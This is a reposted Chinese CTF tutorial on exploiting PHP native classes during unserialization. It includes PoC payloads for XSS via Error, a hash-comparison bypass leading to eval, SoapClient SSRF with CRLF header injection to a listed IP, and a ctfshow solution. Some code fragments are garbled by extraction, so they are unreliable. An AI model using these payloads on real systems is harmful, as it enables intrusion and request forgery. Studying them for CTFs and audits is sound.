PHP反序列化原生類實例分析

這篇文章主要介紹“PHP反序列化原生類實例分析”的相關知識，小編通過實際案例向大家展示操作過程，操作方法簡單快捷，實用性強，希望這篇“PHP反序列化原生類實例分析”文章能幫助大家解決問題。

成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務，包含不限于成都網(wǎng)站制作、網(wǎng)站建設、外貿(mào)網(wǎng)站建設、章丘網(wǎng)絡推廣、微信小程序定制開發(fā)、章丘網(wǎng)絡營銷、章丘企業(yè)策劃、章丘品牌公關、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運營等，從售前售中售后，我們都將竭誠為您服務，您的肯定，是我們最大的嘉獎；成都創(chuàng)新互聯(lián)公司為所有大學生創(chuàng)業(yè)者提供章丘建站搭建服務，24小時服務熱線：13518219792，官方網(wǎng)址：www.cdcxhl.com

PHP反序列化原生類實例分析

淺析php反序列化原生類的利用

如果在代碼審計或者ctf中，有反序列化的功能點，但是卻不能構造出完整的pop鏈，那這時我們應該如何破局呢？我們可以嘗試一下從php原生類下手，php有些原生類中內(nèi)置一些魔術方法，如果我們巧妙構造可控參數(shù)，觸發(fā)并利用其內(nèi)置魔術方法，就有可能達到一些我們想要的目的。

一、常見魔術方法

__wakeup() //執(zhí)行unserialize()時，先會調(diào)用這個函數(shù)
__sleep() //執(zhí)行serialize()時，先會調(diào)用這個函數(shù)
__destruct() //對象被銷毀時觸發(fā)
__call() //在對象上下文中調(diào)用不可訪問的方法時觸發(fā)
__callStatic() //在靜態(tài)上下文中調(diào)用不可訪問的方法時觸發(fā)
__get() //用于從不可訪問的屬性讀取數(shù)據(jù)或者不存在這個鍵都會調(diào)用此方法
__set() //用于將數(shù)據(jù)寫入不可訪問的屬性
__isset() //在不可訪問的屬性上調(diào)用isset()或empty()觸發(fā)
__unset() //在不可訪問的屬性上使用unset()時觸發(fā)
__toString() //把對象當作字符串使用時觸發(fā)
__invoke() //當嘗試將對象調(diào)用為函數(shù)時觸發(fā)

二、原生類中的魔術方法

我們采用下面腳本遍歷一下所有原生類中的魔術方法

三、一些常見原生類的利用
Error/Exception
Error是所有PHP內(nèi)部錯誤類的基類。 (PHP 7, 8)
**Error::__toString ** error 的字符串表達
返回 Error 的 string表達形式。
Exception是所有用戶級異常的基類。 (PHP 5, 7, 8)
**Exception::__toString ** 將異常對象轉(zhuǎn)換為字符串
返回轉(zhuǎn)換為字符串（string）類型的異常。
類屬性
message 錯誤消息內(nèi)容
code 錯誤代碼
file 拋出錯誤的文件名
line 拋出錯誤的行數(shù)
XSS
__toString方法會返回錯誤或異常的字符串形式，其中包含我們輸入的參數(shù)，如果我們構造一串xss代碼，結合echo渲染，將觸發(fā)反射形xss漏洞
示例：
POC：
alert('xss')");$b = serialize($a);echo urlencode($b);
hash繞過
先看一道題
[2020 極客大挑戰(zhàn)]Greatphp
syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }

        }
    }}if (isset($_GET['great'])){
    unserialize($_GET['great']);} else {
    highlight_file(__FILE__);}
需要繞過兩個hash強比較，且最終需要構造eval代碼執(zhí)行
顯然正常方法是行不通的，而通過原生類可進行繞過
同樣，當md5()和sha1()函數(shù)處理對象時，會自動調(diào)用__tostring方法
先簡單看一下其輸出
";
echo $b."
";
echo $c."
";
echo $d;
可以發(fā)現(xiàn)，這兩個原生類返回的信息除了行號一模一樣，利用這點，我們可以嘗試進行hash函數(shù)的繞過，需要注意的是，必須將兩個傳入的對象放到同一行
因此我們可以進行簡單的測試,發(fā)現(xiàn)使用此方法可以繞過hash強(弱)函數(shù)比較
根據(jù)這些知識點，我們可以輕松構造payload
  syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
		   if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
			   eval($this->syc);
		   } else {
			   die("Try Hard !!");
		   }
		   
		}
	}}$str = "?>";//兩次取反繞過正則$a=new Error($str,1);
	$b=new Error($str,2);
	$c = new SYCLOVER();$c->syc = $a;$c->lover = $b;
	echo(urlencode(serialize($c)));?>
SoapClient
SoapClient是一個專門用來訪問web服務的類，可以提供一個基于SOAP協(xié)議訪問Web服務的 PHP 客戶端，可以創(chuàng)建soap數(shù)據(jù)報文，與wsdl接口進行交互
soap擴展模塊默認關閉，使用時需手動開啟
SoapClient::__call—調(diào)用 SOAP 函數(shù) (PHP 5, 7, 8)
通常，SOAP 函數(shù)可以作為SoapClient對象的方法調(diào)用
SSRF
構造函數(shù)：
public SoapClient :: SoapClient(mixed $wsdl [，array $options ])
第一個參數(shù)是用來指明是否是wsdl模式，如果為`null`，那就是非wsdl模式。
第二個參數(shù)為一個數(shù)組，如果在wsdl模式下，此參數(shù)可選；如果在非wsdl模式下，則必須設置location和uri選項，其中l(wèi)ocation是要將請求發(fā)送到的SOAP服務器的URL，而uri 是SOAP服務的目標命名空間。
什么是soap
SOAP 是基于 XML 的簡易協(xié)議，是用在分散或分布的環(huán)境中交換信息的簡單的協(xié)議，可使應用程序在 HTTP 之上進行信息交換
SOAP是webService三要素（SOAP、WSDL、UDDI）之一：WSDL 用來描述如何訪問具體的接口， UDDI用來管理，分發(fā)，查詢webService ，SOAP（簡單對象訪問協(xié)議）是連接或Web服務或客戶端和Web服務之間的接口。
其采用HTTP作為底層通訊協(xié)議，XML作為數(shù)據(jù)傳送的格式。
我們構造一個利用payload，第一個參數(shù)為NULL，第二個參數(shù)的location設置為vps地址
 'http://47.102.146.95:2333', 
'uri' =>'uri',
'user_agent'=>'111111'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();
監(jiān)聽vps的2333端口，如下圖所示成功觸發(fā)SSRF，vps收到了請求信息
且可以看到SOAPAction和user_agent都可控
本地測試時發(fā)現(xiàn)，當使用此內(nèi)置類(即soap協(xié)議)請求存在服務的端口時，會立即報錯，而去訪問不存在服務(未占用)的端口時，會等待一段時間報錯，可以以此進行內(nèi)網(wǎng)資產(chǎn)的探測。
如果配合CRLF漏洞，還可以可通過 SoapClient 來控制其他參數(shù)或者post發(fā)送數(shù)據(jù)。例如:HTTP協(xié)議去攻擊redis
CRLF知識擴展
HTTP報文的結構：狀態(tài)行和首部中的每行以CRLF結束，首部與主體之間由一空行分隔。
CRLF注入漏洞，是因為Web應用沒有對用戶輸入做嚴格驗證，導致攻擊者可以輸入一些惡意字符。
攻擊者一旦向請求行或首部中的字段注入惡意的CRLF(\r\n)，就能注入一些首部字段或報文主體，并在響應中輸出。
通過結合CRLF，我們利用SoapClient+CRLF便可以干更多的事情，例如插入自定義Cookie，
 'http://47.102.146.95:2333',
    'uri' =>'uri',
    'user_agent'=>"111111\r\nCookie: PHPSESSION=dasdasd564d6as4d6a"));
    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();
發(fā)送POST的數(shù)據(jù)包，這里需要將Content-Type設置為application/x-www-form-urlencoded，我們可以通過添加兩個\r\n來將原來的Content-Type擠下去，自定義一個新的Content-Type
 'http://47.102.146.95:2333',
    'uri' =>'uri',
    'user_agent'=>"111111\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length: 10\r\n\r\npostdata"));
    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();
看一道ctfshow上的題，完美利用上述知識點
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff); //獲取xff頭


if($ip!=='127.0.0.1'){
    die('error');
}else{
    $token = $_POST['token'];
    if($token=='ctfshow'){
        file_put_contents('flag.txt',$flag);
    }
}
poc：
 $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
$a = serialize($b);
$a = str_replace('^^',"\r\n",$a);
echo urlencode($a);
?>
DirectoryIterator/FilesystemIterator
DirectoryIterator類提供了一個簡單的接口來查看文件系統(tǒng)目錄的內(nèi)容。
DirectoryIterator::__toString獲取字符串形式的文件名 （PHP 5,7,8）
目錄遍歷
使用此內(nèi)置類的__toString方法結合glob或file協(xié)議，即可實現(xiàn)目錄遍歷
例如:
';
}
FilesystemIterator繼承于DirectoryIterator，兩者作用和用法基本相同，區(qū)別為FilesystemIterator會顯示文件的完整路徑，而DirectoryIterator只顯示文件名
因為可以配合使用glob偽協(xié)議(查找匹配的文件路徑模式)，所以可以繞過open_basedir的限制
在php4.3以后使用了zend_class_unserialize_deny來禁止一些類的反序列化，很不幸的是這兩個原生類都在禁止名單當中
SplFileObject
SplFileObject 類為單個文件的信息提供了一個面向?qū)ο蟮母呒壗涌?/p>
(PHP 5 >= 5.1.2, PHP 7, PHP 8)
文件讀取
SplFileObject::__toString— 以字符串形式返回文件的路徑
如果沒有遍歷的話只能讀取第一行，且受到open_basedir影響
SimpleXMLElement
解析XML 文檔中的元素。 （PHP 5、PHP 7、PHP 8）
SimpleXMLElement::__construct— 創(chuàng)建一個新的 SimpleXMLElement 對象
XXE
我們查看一下其參數(shù)：
根據(jù)官方文檔，發(fā)現(xiàn)當?shù)谌齻€參數(shù)為True時，即可實現(xiàn)遠程xml文件載入，第二個參數(shù)的常量值設置為2即可。
ReflectionMethod
獲取注釋內(nèi)容
(PHP 5 >= 5.1.0, PHP 7, PHP 8)
ReflectionFunctionAbstract::getDocComment — 獲取注釋內(nèi)容
由該原生類中的getDocComment方法可以訪問到注釋的內(nèi)容
同時可利用的原生類還有ZipArchive– 刪除文件等等，不在敘述
關于“PHP反序列化原生類實例分析”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關的知識，可以關注創(chuàng)新互聯(lián)行業(yè)資訊頻道，小編每天都會為大家更新不同的知識點。            
            
                        

            分享名稱：PHP反序列化原生類實例分析            

            文章轉(zhuǎn)載：http://weahome.cn/article/iehgjh.html